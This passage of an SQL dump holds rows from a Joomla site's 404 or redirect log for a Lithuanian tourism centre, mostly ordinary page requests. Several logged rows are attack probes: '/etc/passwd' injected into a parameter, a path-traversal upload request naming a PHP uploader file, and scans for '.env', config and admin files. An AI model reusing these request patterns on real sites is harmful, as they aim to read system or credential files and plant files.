00:00:00'),(4810,'https://infotytuvenai.lt/index.php/lt/assets/js/sb-admin.js','','','',1,0,'2021-04-18 21:52:51','0000-00-00 00:00:00'),(4811,'https://infotytuvenai.lt/index.php/lt/menu.php','','','',1,0,'2021-04-18 21:53:00','0000-00-00 00:00:00'),(4812,'https://infotytuvenai.lt/index.php/lt/include/db.php','','','',1,0,'2021-04-18 21:53:03','0000-00-00 00:00:00'),(4813,'https://infotytuvenai.lt/index.php/lt/indexu.php','','','',1,0,'2021-04-18 21:53:07','0000-00-00 00:00:00'),(4814,'https://infotytuvenai.lt/index.php/lt/theme/header.html','','','',2,0,'2021-04-18 21:53:08','0000-00-00 00:00:00'),(4815,'https://infotytuvenai.lt/index.php/lt/cp.php','','','',1,0,'2021-04-18 21:53:09','0000-00-00 00:00:00'),(4816,'https://infotytuvenai.lt/index.php/lt/theme/images/back-all.jpg','','','',1,0,'2021-04-18 21:53:10','0000-00-00 00:00:00'),(4817,'https://infotytuvenai.lt/index.php/lt/back.css','','','',1,0,'2021-04-18 21:53:11','0000-00-00 00:00:00'),(4818,'https://infotytuvenai.lt/index.php/lt/Panel/login.php','','','',1,0,'2021-04-18 21:53:12','0000-00-00 00:00:00'),(4819,'https://infotytuvenai.lt/index.php/lt/gate.php','','','',1,0,'2021-04-18 21:53:13','0000-00-00 00:00:00'),(4820,'https://infotytuvenai.lt/index.php/lt/notexistentpath.php','','','',1,0,'2021-04-18 21:53:15','0000-00-00 00:00:00'),(4821,'https://infotytuvenai.lt/index.php/lt/asfdsfafggdf.php','','','',1,0,'2021-04-18 21:53:17','0000-00-00 00:00:00'),(4822,'https://infotytuvenai.lt/index.php/lt/post.php','','','',1,0,'2021-04-18 21:53:18','0000-00-00 00:00:00'),(4823,'https://infotytuvenai.lt/index.php/lt/e.php','','','',1,0,'2021-04-18 21:53:18','0000-00-00 00:00:00'),(4824,'https://infotytuvenai.lt/index.php/lt/images/','','','',1,0,'2021-04-18 21:53:19','0000-00-00 00:00:00'),(4825,'https://infotytuvenai.lt/index.php/lt/home.php','','','',1,0,'2021-04-18 21:53:22','0000-00-00 00:00:00'),(4826,'https://infotytuvenai.lt/index.php/lt/main.php','','','',1,0,'2021-04-18 21:53:28','0000-00-00 00:00:00'),(4827,'https://infotytuvenai.lt/index.php/lt/submit.php','','','',1,0,'2021-04-18 21:53:29','0000-00-00 00:00:00'),(4828,'https://infotytuvenai.lt/index.php/lt/style.css','','','',1,0,'2021-04-18 21:53:32','0000-00-00 00:00:00'),(4829,'https://infotytuvenai.lt/index.php/lt/includes/design/images/favicon.ico','','','',1,0,'2021-04-18 21:53:33','0000-00-00 00:00:00'),(4830,'https://infotytuvenai.lt/index.php/lt/assets/img/favicon.ico','','','',1,0,'2021-04-18 21:53:35','0000-00-00 00:00:00'),(4831,'https://infotytuvenai.lt/index.php/lt/admin.php?login=true','','','',1,0,'2021-04-18 21:53:53','0000-00-00 00:00:00'),(4832,'https://infotytuvenai.lt/index.php/lt/bins.php','','','',1,0,'2021-04-18 21:53:54','0000-00-00 00:00:00'),(4833,'https://infotytuvenai.lt/index.php/lt/resources/images/ifpigscouldfly.ym','','','',1,0,'2021-04-18 21:53:55','0000-00-00 00:00:00'),(4834,'https://infotytuvenai.lt/index.php/lt/resources/scripts/DD_belatedPNG_0.0.7a.js','','','',1,0,'2021-04-18 21:53:55','0000-00-00 00:00:00'),(4835,'https://infotytuvenai.lt/index.php/lt/database.php','','','',1,0,'2021-04-18 21:53:56','0000-00-00 00:00:00'),(4836,'https://infotytuvenai.lt/index.php/lt/PvqDq929BSx_A_D_M1n_a.php','','','',1,0,'2021-04-18 21:53:57','0000-00-00 00:00:00'),(4837,'https://infotytuvenai.lt/index.php/lt/fre.php','','','',1,0,'2021-04-18 21:53:57','0000-00-00 00:00:00'),(4838,'https://infotytuvenai.lt/index.php/lt/uMc.php','','','',1,0,'2021-04-18 21:53:58','0000-00-00 00:00:00'),(4839,'https://infotytuvenai.lt/index.php/lt/link.php','','','',1,0,'2021-04-18 21:53:59','0000-00-00 00:00:00'),(4840,'https://infotytuvenai.lt/index.php/lt/config.php','','','',2,0,'2021-04-18 21:54:16','0000-00-00 00:00:00'),(4841,'https://infotytuvenai.lt/index.php/lt/admin/resources/images/','','','',2,0,'2021-04-18 21:54:17','0000-00-00 00:00:00'),(4842,'https://infotytuvenai.lt/index.php/lt/admin/resources/css/','','','',2,0,'2021-04-18 21:54:18','0000-00-00 00:00:00'),(4843,'https://infotytuvenai.lt/index.php/lt/admin/flags/','','','',2,0,'2021-04-18 21:54:19','0000-00-00 00:00:00'),(4844,'https://infotytuvenai.lt/index.php/lt/admin/images/','','','',2,0,'2021-04-18 21:54:21','0000-00-00 00:00:00'),(4845,'https://infotytuvenai.lt/index.php/lt/images/favicon.ico','','','',1,0,'2021-04-18 21:54:24','0000-00-00 00:00:00'),(4846,'https://infotytuvenai.lt/index.php/lt/o1o/a10.php','','','',1,0,'2021-04-18 21:54:26','0000-00-00 00:00:00'),(4847,'https://infotytuvenai.lt/index.php/lt/api.php','','','',1,0,'2021-04-18 21:54:29','0000-00-00 00:00:00'),(4848,'https://infotytuvenai.lt/index.php/lt/data/login.css','','','',1,0,'2021-04-18 21:54:30','0000-00-00 00:00:00'),(4849,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=41:korupcijos-prevencija&catid=13&Itemid=211','','','',37,0,'2021-04-23 19:43:58','0000-00-00 00:00:00'),(4850,'https://infotytuvenai.lt/index.php/lt/apie-centra/galerija','','','',4,0,'2021-04-24 14:57:40','0000-00-00 00:00:00'),(4851,'https://www.infotytuvenai.lt/index.php/lt/?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20','','','',8,0,'2021-04-24 15:46:55','0000-00-00 00:00:00'),(4852,'https://infotytuvenai.lt/index.php/lt/kFi730Cwe0Rau3I5fi/dNI0fb5PFDJiT5/egJmggpCfQDG','','','',1,0,'2021-04-26 07:10:31','0000-00-00 00:00:00'),(4853,'https://www.infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../','','','',1,0,'2021-04-28 01:36:30','0000-00-00 00:00:00'),(4854,'https://www.infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Uploader_By_Cloud7_Agath1619573414.php','','','',1,0,'2021-04-28 01:36:34','0000-00-00 00:00:00'),(4855,'https://www.infotytuvenai.lt/index.php/lt/?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2021-04-28 01:36:38','0000-00-00 00:00:00'),(4856,'https://www.infotytuvenai.lt/index.php/lt/?option=com_collector&view=filelist&tmpl=component&folder=&type=1','','','',1,0,'2021-04-28 01:39:15','0000-00-00 00:00:00'),(4857,'https://www.infotytuvenai.lt/index.php/lt/?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en','','','',1,0,'2021-04-28 01:39:23','0000-00-00 00:00:00'),(4858,'https://www.infotytuvenai.lt/index.php/lt/?option=com_djclassifieds&task=upload&tmpl=component','','','',2,0,'2021-04-28 01:39:32','0000-00-00 00:00:00'),(4859,'https://www.infotytuvenai.lt/index.php/lt/pl','','','',1,0,'2021-04-29 12:12:35','0000-00-00 00:00:00'),(4860,'https://infotytuvenai.lt/index.php/lt/?option=com_k2&view=item&id=23:sveikinimas&Itemid=124','','','',3,0,'2021-05-05 16:38:48','0000-00-00 00:00:00'),(4861,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/185-galerija','','','',13,0,'2021-05-21 19:59:41','0000-00-00 00:00:00'),(4862,'https://www.infotytuvenai.lt/index.php/lt/kontaktai/1','','','',3,0,'2021-05-22 09:50:39','0000-00-00 00:00:00'),(4863,'https://www.infotytuvenai.lt/index.php/en/component/content/category/43-apie-centra/general','','','',5,0,'2021-05-28 08:39:18','0000-00-00 00:00:00'),(4864,'https://www.infotytuvenai.lt/index.php/en/component/content/category/47-piligrimai/piligrimai','','','',6,0,'2021-05-28 08:39:58','0000-00-00 00:00:00'),(4865,'https://www.infotytuvenai.lt/index.php/en/component/content/category/51-vienuolynas/vienuolynas','','','',5,0,'2021-05-28 08:40:21','0000-00-00 00:00:00'),(4866,'https://www.infotytuvenai.lt/index.php/en/component/content/category/41-apie-centra/projektai','','','',5,0,'2021-05-28 08:42:52','0000-00-00 00:00:00'),(4867,'https://www.infotytuvenai.lt/index.php/en/component/content/category/56-tytuvenu-festivalis/naujienos','','','',2,0,'2021-05-28 08:45:01','0000-00-00 00:00:00'),(4868,'https://www.infotytuvenai.lt/index.php/en/component/content/category/46-tytuvenai/apie-tytuvenus','','','',2,0,'2021-05-28 08:45:43','0000-00-00 00:00:00'),(4869,'https://www.infotytuvenai.lt/index.php/lt/admin/','','','',19,0,'2021-06-01 00:01:27','0000-00-00 00:00:00'),(4870,'https://www.infotytuvenai.lt/index.php/lt/manager/','','','',19,0,'2021-06-01 00:01:29','0000-00-00 00:00:00'),(4871,'https://www.infotytuvenai.lt/index.php/lt/admin/content/sitetree/','','','',14,0,'2021-06-01 00:01:32','0000-00-00 00:00:00'),(4872,'https://www.infotytuvenai.lt/index.php/lt/simpla/','','','',14,0,'2021-06-01 00:01:34','0000-00-00 00:00:00'),(4873,'https://www.infotytuvenai.lt/index.php/lt/js/mage/cookies.js','','','',14,0,'2021-06-01 00:01:35','0000-00-00 00:00:00'),(4874,'https://www.infotytuvenai.lt/index.php/en/component/content/category/images/stories/istatai.pdf','','','',1,0,'2021-06-01 01:14:31','0000-00-00 00:00:00'),(4875,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/2-uncategorised/188-gamtos-paminklai','','','',1,0,'2021-06-05 21:14:51','0000-00-00 00:00:00'),(4876,'https://www.infotytuvenai.lt/index.php/lt/?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image','','http://infotytuvenai.lt/index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image','',1,0,'2021-06-07 22:03:07','0000-00-00 00:00:00'),(4877,'https://www.infotytuvenai.lt/index.php/en/component/content/category/undefined/','','','',2,0,'2021-06-09 06:24:20','0000-00-00 00:00:00'),(4878,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=41:korupcijos-prevencija&catid=13:veikla&Itemid=206','','','',15,0,'2021-06-17 17:37:28','0000-00-00 00:00:00'),(4879,'https://www.infotytuvenai.lt/index.php/lt/?option=com_acymailing&ctrl=frontmails&task=setNewIconShare','','http://www.google.com/','',3,0,'2021-06-19 15:56:02','0000-00-00 00:00:00'),(4880,'https://infotytuvenai.lt/index.php/lt/apie-centra/suvenyrai','','','',5,0,'2021-06-22 22:36:49','0000-00-00 00:00:00'),(4881,'https://www.infotytuvenai.lt/index.php/lt/forum.php','','','',4,0,'2021-06-30 08:49:17','0000-00-00 00:00:00'),(4882,'https://www.infotytuvenai.lt/index.php/lt/using-joomla/extensions/components/users-component/registration-form','','https://www.infotytuvenai.lt/index.php/using-joomla/extensions/components/users-component/registration-form','',5237,0,'2021-07-06 20:20:57','0000-00-00 00:00:00'),(4883,'https://www.infotytuvenai.lt/index.php/lt/?option=com_acym&ctrl=frontmails&task=setNewIconShare','','http://www.google.com/','',12,0,'2021-07-07 01:55:33','0000-00-00 00:00:00'),(4884,'https://www.infotytuvenai.lt/index.php/lt/component/k2/item/1?start=1','','http://infotytuvenai.lt/index.php/component/k2/item/1?start=1','',1,0,'2021-07-09 21:27:14','0000-00-00 00:00:00'),(4885,'https://www.infotytuvenai.lt/index.php/en/ru','','','',2,0,'2021-07-12 09:35:22','0000-00-00 00:00:00'),(4886,'https://infotytuvenai.lt/index.php/lt/apie-centra/viesieji-pirkimai/mazos-vertes-uz-2016-m','','','',2,0,'2021-07-22 14:59:25','0000-00-00 00:00:00'),(4887,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/{{EXTENSION_BASE_URL}}/af7ae505a9eed503f8b8e6982036873e.woff2','','https://www.infotytuvenai.lt/index.php/lt/apie-centra/paslaugos','',1,0,'2021-07-29 05:49:13','0000-00-00 00:00:00'),(4888,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/{{EXTENSION_BASE_URL}}/fee66e712a8a08eef5805a46892932ad.woff','','https://www.infotytuvenai.lt/index.php/lt/apie-centra/paslaugos','',1,0,'2021-07-29 05:49:16','0000-00-00 00:00:00'),(4889,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/{{EXTENSION_BASE_URL}}/b06871f281fee6b241d60582ae9369b9.ttf','','https://www.infotytuvenai.lt/index.php/lt/apie-centra/paslaugos','',1,0,'2021-07-29 05:49:17','0000-00-00 00:00:00'),(4890,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/{{EXTENSION_BASE_URL}}/af7ae505a9eed503f8b8e6982036873e.woff2','','https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai','',1,0,'2021-07-29 05:54:48','0000-00-00 00:00:00'),(4891,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/{{EXTENSION_BASE_URL}}/fee66e712a8a08eef5805a46892932ad.woff','','https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai','',1,0,'2021-07-29 05:54:48','0000-00-00 00:00:00'),(4892,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/{{EXTENSION_BASE_URL}}/b06871f281fee6b241d60582ae9369b9.ttf','','https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai','',1,0,'2021-07-29 05:54:48','0000-00-00 00:00:00'),(4893,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/viesieji-pirkimai/mazos-vertes-pirkimai-2014-m','','','',9,0,'2021-07-29 06:57:49','0000-00-00 00:00:00'),(4894,'https://www.infotytuvenai.lt/index.php/lt/wp-login.php','','','',5,0,'2021-08-01 09:34:09','0000-00-00 00:00:00'),(4895,'https://www.infotytuvenai.lt/index.php/lt/blog/wp-login.php','','','',1,0,'2021-08-01 09:34:09','0000-00-00 00:00:00'),(4896,'https://www.infotytuvenai.lt/index.php/lt/blog/','','','',1,0,'2021-08-01 09:34:10','0000-00-00 00:00:00'),(4897,'https://www.infotytuvenai.lt/index.php/lt/administrator/','','','',7,0,'2021-08-01 09:34:10','0000-00-00 00:00:00'),(4898,'https://www.infotytuvenai.lt/index.php/lt/user/','','','',1,0,'2021-08-01 09:34:12','0000-00-00 00:00:00'),(4899,'https://www.infotytuvenai.lt/index.php/lt/user/login/','','','',1,0,'2021-08-01 09:34:12','0000-00-00 00:00:00'),(4900,'https://www.infotytuvenai.lt/index.php/lt/admin.php','','','',1,0,'2021-08-01 09:34:13','0000-00-00 00:00:00'),(4901,'https://www.infotytuvenai.lt/index.php/lt/admin/index.php','','','',1,0,'2021-08-01 09:34:13','0000-00-00 00:00:00'),(4902,'https://www.infotytuvenai.lt/index.php/lt/admin/users/login_do/','','','',1,0,'2021-08-01 09:34:13','0000-00-00 00:00:00'),(4903,'https://infotytuvenai.lt/index.php/lt/apie-centra/viesieji-pirkimai','','','',5,0,'2021-08-02 04:23:20','0000-00-00 00:00:00'),(4904,'https://www.infotytuvenai.lt/index.php/lt/44-paskutinesnaujienos/235-edukacine-programa-piligrimu-gira','','','',108,0,'2021-08-03 08:44:11','0000-00-00 00:00:00'),(4905,'https://www.infotytuvenai.lt/index.php/lt/?option=/etc/passwd&view=article&id=41&Itemid=211','','https://www.infotytuvenai.lt/index.php?option=/etc/passwd&view=article&id=41&Itemid=211','',2,0,'2021-08-03 17:16:48','0000-00-00 00:00:00'),(4906,'https://www.infotytuvenai.lt/index.php/lt/?option=/etc/passwd&view=article&id=32','','https://www.infotytuvenai.lt/index.php?option=/etc/passwd&view=article&id=32','',2,0,'2021-08-03 19:50:54','0000-00-00 00:00:00'),(4907,'https://www.infotytuvenai.lt/index.php/en/44-paskutinesnaujienos/235-edukacine-programa-piligrimu-gira','','','',14,0,'2021-08-07 09:18:59','0000-00-00 00:00:00'),(4908,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/44-paskutinesnaujienos/235-edukacine-programa-piligrimu-gira','','','',23,0,'2021-08-07 20:50:40','0000-00-00 00:00:00'),(4909,'https://www.infotytuvenai.lt/index.php/lt/lankytiniobjektai/kulturos-paveldo-objektai','','','',6,0,'2021-08-07 23:25:32','0000-00-00 00:00:00'),(4910,'https://infotytuvenai.lt/index.php/lt/44-paskutinesnaujienos/235-edukacine-programa-piligrimu-gira','','','',6,0,'2021-08-08 23:37:46','0000-00-00 00:00:00'),(4911,'https://infotytuvenai.lt/index.php/lt/apgyvendinimas/kaimo-turizmas','','','',2,0,'2021-08-11 17:40:17','0000-00-00 00:00:00'),(4912,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/naujienos/56-tytuvenu-festivalis/naujienos/favicon.ico','','','',1,0,'2021-08-19 15:55:20','0000-00-00 00:00:00'),(4913,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/fancybox/fancy_shadow_ne.png','','https://www.infotytuvenai.lt/index.php/lt/apie-centra/edukacines-programos','',2,0,'2021-08-27 01:54:45','0000-00-00 00:00:00'),(4914,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/fancybox/fancy_shadow_n.png','','https://www.infotytuvenai.lt/index.php/lt/apie-centra/edukacines-programos','',2,0,'2021-08-27 01:54:45','0000-00-00 00:00:00'),(4915,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/fancybox/fancy_shadow_se.png','','https://www.infotytuvenai.lt/index.php/lt/apie-centra/edukacines-programos','',2,0,'2021-08-27 01:54:47','0000-00-00 00:00:00'),(4916,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/fancybox/fancy_shadow_e.png','','https://www.infotytuvenai.lt/index.php/lt/apie-centra/edukacines-programos','',2,0,'2021-08-27 01:54:47','0000-00-00 00:00:00'),(4917,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/fancybox/fancy_shadow_w.png','','https://www.infotytuvenai.lt/index.php/lt/apie-centra/edukacines-programos','',2,0,'2021-08-27 01:54:48','0000-00-00 00:00:00'),(4918,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/fancybox/fancy_shadow_sw.png','','https://www.infotytuvenai.lt/index.php/lt/apie-centra/edukacines-programos','',2,0,'2021-08-27 01:54:48','0000-00-00 00:00:00'),(4919,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/fancybox/fancy_shadow_s.png','','https://www.infotytuvenai.lt/index.php/lt/apie-centra/edukacines-programos','',2,0,'2021-08-27 01:54:49','0000-00-00 00:00:00'),(4920,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/fancybox/fancy_shadow_nw.png','','https://www.infotytuvenai.lt/index.php/lt/apie-centra/edukacines-programos','',2,0,'2021-08-27 01:54:49','0000-00-00 00:00:00'),(4921,'https://infotytuvenai.lt/index.php/lt/component/content/category/56-tytuvenu-festivalis/naujienos','','','',3,0,'2021-08-27 12:37:53','0000-00-00 00:00:00'),(4922,'https://infotytuvenai.lt/index.php/lt/component/content/category/images/stories/istatai.pdf','','','',1,0,'2021-08-27 19:15:50','0000-00-00 00:00:00'),(4923,'https://infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2016_metu_veiklos_ataskaita.pdf','','','',1,0,'2021-08-28 10:05:37','0000-00-00 00:00:00'),(4924,'https://infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/veiklos_ataskaita_2019.pdf','','','',1,0,'2021-08-28 10:07:03','0000-00-00 00:00:00'),(4925,'https://infotytuvenai.lt/index.php/lt/component/content/category/images/stories/2021_2025_m_starteginis_veiklos_planas.pdf','','','',1,0,'2021-08-28 10:42:59','0000-00-00 00:00:00'),(4926,'https://infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2014m_veiklos_ataskaita.pdf','','','',1,0,'2021-08-28 19:02:12','0000-00-00 00:00:00'),(4927,'https://infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2015_m_balansas_ir_veiklos_rezultatai.pdf','','','',1,0,'2021-08-28 19:05:19','0000-00-00 00:00:00'),(4928,'https://infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/balansas_ir_veiklos_rezultatu_ataskaita_2016m.pdf','','','',1,0,'2021-08-28 19:19:37','0000-00-00 00:00:00'),(4929,'https://infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2013m_veiklos_ataskaita.pdf','','','',1,0,'2021-08-29 06:23:13','0000-00-00 00:00:00'),(4930,'https://infotytuvenai.lt/index.php/lt/component/content/category/images/stories/muziejus/sarbievijaus_muziejus/edukacines_programos_kraziuose_placiau.pdf','','','',1,0,'2021-08-29 21:26:48','0000-00-00 00:00:00'),(4931,'https://infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2015_metu_veiklos_ataskaita.pdf','','','',1,0,'2021-08-30 14:36:20','0000-00-00 00:00:00'),(4932,'https://infotytuvenai.lt/index.php/lt/component/content/category/undefined/','','','',1,0,'2021-08-31 11:35:59','0000-00-00 00:00:00'),(4933,'https://www.infotytuvenai.lt/index.php/lt/.env','','','',1,0,'2021-09-07 02:32:19','0000-00-00 00:00:00'),(4934,'https://www.infotytuvenai.lt/index.php/lt//.env','','','',1,0,'2021-09-07 02:32:20','0000-00-00 00:00:00'),(4935,'https://infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2020_m_veiklos_ataskaita.pdf','','','',3,0,'2021-09-09 18:04:40','0000-00-00 00:00:00'),(4936,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=item&id=13:isankstine-registracija&Itemid=124','','','',1,0,'2021-09-10 12:45:49','0000-00-00 00:00:00'),(4937,'https://infotytuvenai.lt/index.php/lt/?option=com_content&id=30&Itemid=204','','','',9,0,'2021-09-12 22:26:50','0000-00-00 00:00:00'),(4938,'https://infotytuvenai.lt/index.php/lt/?option=com_content&id=30','','','',5,0,'2021-09-12 22:33:02','0000-00-00 00:00:00'),(4939,'https://infotytuvenai.lt/index.php/lt/?option=com_k2&view=324&layout=category&task=category&id=9&Itemid=124','','','',1,0,'2021-09-12 22:35:31','0000-00-00 00:00:00'),(4940,'https://infotytuvenai.lt/index.php/lt/?option=com_content&id=58&Itemid=208','','','',4,0,'2021-09-12 22:36:31','0000-00-00 00:00:00'),(4941,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&id=58&Itemid=208','','','',4,0,'2021-09-12 22:41:11','0000-00-00 00:00:00'),(4942,'https://infotytuvenai.lt/index.php/lt/?option=com_content&id=305','','','',6,0,'2021-09-12 22:42:32','0000-00-00 00:00:00'),(4943,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&id=30','','','',6,0,'2021-09-12 22:52:25','0000-00-00 00:00:00'),(4944,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&id=60&Itemid=201','','','',5,0,'2021-09-12 22:53:03','0000-00-00 00:00:00'),(4945,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=938&id=16:covid-19-identifikavimas&Itemid=124','','','',1,0,'2021-09-12 23:01:34','0000-00-00 00:00:00'),(4946,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&id=59:nemokamos-paslaugos&catid=2:uncategorised&Itemid=209','','','',9,0,'2021-09-12 23:02:14','0000-00-00 00:00:00'),(4947,'https://infotytuvenai.lt/index.php/lt/?option=com_content&id=62&Itemid=213','','','',2,0,'2021-09-14 01:02:37','0000-00-00 00:00:00'),(4948,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&id=61&Itemid=212','','','',2,0,'2021-09-14 01:06:26','0000-00-00 00:00:00'),(4949,'https://infotytuvenai.lt/index.php/lt/?option=com_content&id=32','','','',4,0,'2021-09-14 01:14:29','0000-00-00 00:00:00'),(4950,'https://infotytuvenai.lt/index.php/lt/?option=com_content&id=61&Itemid=212','','','',2,0,'2021-09-14 01:23:32','0000-00-00 00:00:00'),(4951,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&id=306','','','',2,0,'2021-09-14 01:25:26','0000-00-00 00:00:00'),(4952,'https://infotytuvenai.lt/index.php/lt/?option=com_content&id=306','','','',2,0,'2021-09-14 01:29:41','0000-00-00 00:00:00'),(4953,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&id=32','','','',4,0,'2021-09-14 01:30:40','0000-00-00 00:00:00'),(4954,'https://infotytuvenai.lt/index.php/lt/?option=com_content&id=13&Itemid=197','','','',2,0,'2021-09-14 01:32:29','0000-00-00 00:00:00'),(4955,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&id=68&Itemid=217','','','',4,0,'2021-09-14 01:33:39','0000-00-00 00:00:00'),(4956,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&id=62&Itemid=213','','','',2,0,'2021-09-14 01:36:00','0000-00-00 00:00:00'),(4957,'https://infotytuvenai.lt/index.php/lt/?option=com_content&id=68&Itemid=217','','','',4,0,'2021-09-14 01:39:02','0000-00-00 00:00:00'),(4958,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=41:korupcijos-prevencija&catid=13&Itemid=206','','','',6,0,'2021-09-14 02:22:21','0000-00-00 00:00:00'),(4959,'https://infotytuvenai.lt/index.php/lt/?option=com_content&id=38&Itemid=202','','','',2,0,'2021-09-15 21:11:04','0000-00-00 00:00:00'),(4960,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=20&id=11:del-covid-19-prevencijos&Itemid=124','','','',1,0,'2021-09-15 21:27:05','0000-00-00 00:00:00'),(4961,'https://infotytuvenai.lt/index.php/lt/?option=com_content&id=42&Itemid=203','','','',6,0,'2021-09-17 02:48:28','0000-00-00 00:00:00'),(4962,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=848&id=19:mediku-ragininimas&Itemid=124','','','',1,0,'2021-09-17 03:02:40','0000-00-00 00:00:00'),(4963,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&id=42&Itemid=203','','','',6,0,'2021-09-17 03:07:34','0000-00-00 00:00:00'),(4964,'https://infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/galerija','','','',3,0,'2021-09-18 10:48:04','0000-00-00 00:00:00'),(4965,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=68&id=18:meningokokines-infekcijos&Itemid=124','','','',1,0,'2021-09-20 05:32:57','0000-00-00 00:00:00'),(4966,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/2-uncategorised','','','',5,0,'2021-09-27 10:41:32','0000-00-00 00:00:00'),(4967,'https://infotytuvenai.lt/index.php/lt/apgyvendinimas/apgyvendinimas','','','',2,0,'2021-09-28 12:07:27','0000-00-00 00:00:00'),(4968,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/veiklos_ataskaitos/2020_m_veiklos_ataskaita.pdf','','','',4,0,'2021-10-02 08:38:17','0000-00-00 00:00:00'),(4969,'https://www.infotytuvenai.lt/index.php/lt/start=156','','','',1,0,'2021-10-06 13:25:20','0000-00-00 00:00:00'),(4970,'https://www.infotytuvenai.lt/index.php/lt/start=96','','','',1,0,'2021-10-06 16:11:53','0000-00-00 00:00:00'),(4971,'https://www.infotytuvenai.lt/index.php/lt/start=84','','','',1,0,'2021-10-06 20:05:08','0000-00-00 00:00:00'),(4972,'https://www.infotytuvenai.lt/index.php/lt/start=12','','','',1,0,'2021-10-06 23:01:30','0000-00-00 00:00:00'),(4973,'https://www.infotytuvenai.lt/index.php/lt/start=48','','','',1,0,'2021-10-07 01:20:39','0000-00-00 00:00:00'),(4974,'https://www.infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/44-paskutinesnaujienos/235-edukacine-programa-piligrimu-gira','','','',10,0,'2021-10-09 21:05:12','0000-00-00 00:00:00'),(4975,'https://infotytuvenai.lt/index.php/lt/turizmo-informacija/fancybox/fancy_shadow_ne.png','','https://infotytuvenai.lt/index.php/lt/turizmo-informacija/turizmo-marsrutai','',1,0,'2021-10-14 12:29:32','0000-00-00 00:00:00'),(4976,'https://infotytuvenai.lt/index.php/lt/turizmo-informacija/fancybox/fancy_shadow_n.png','','https://infotytuvenai.lt/index.php/lt/turizmo-informacija/turizmo-marsrutai','',1,0,'2021-10-14 12:29:32','0000-00-00 00:00:00'),(4977,'https://infotytuvenai.lt/index.php/lt/turizmo-informacija/fancybox/fancy_shadow_e.png','','https://infotytuvenai.lt/index.php/lt/turizmo-informacija/turizmo-marsrutai','',1,0,'2021-10-14 12:29:33','0000-00-00 00:00:00'),(4978,'https://infotytuvenai.lt/index.php/lt/turizmo-informacija/fancybox/fancy_shadow_se.png','','https://infotytuvenai.lt/index.php/lt/turizmo-informacija/turizmo-marsrutai','',1,0,'2021-10-14 12:29:33','0000-00-00 00:00:00'),(4979,'https://infotytuvenai.lt/index.php/lt/turizmo-informacija/fancybox/fancy_shadow_w.png','','https://infotytuvenai.lt/index.php/lt/turizmo-informacija/turizmo-marsrutai','',1,0,'2021-10-14 12:29:34','0000-00-00 00:00:00'),(4980,'https://infotytuvenai.lt/index.php/lt/turizmo-informacija/fancybox/fancy_shadow_sw.png','','https://infotytuvenai.lt/index.php/lt/turizmo-informacija/turizmo-marsrutai','',1,0,'2021-10-14 12:29:34','0000-00-00 00:00:00'),(4981,'https://infotytuvenai.lt/index.php/lt/turizmo-informacija/fancybox/fancy_shadow_s.png','','https://infotytuvenai.lt/index.php/lt/turizmo-informacija/turizmo-marsrutai','',1,0,'2021-10-14 12:29:35','0000-00-00 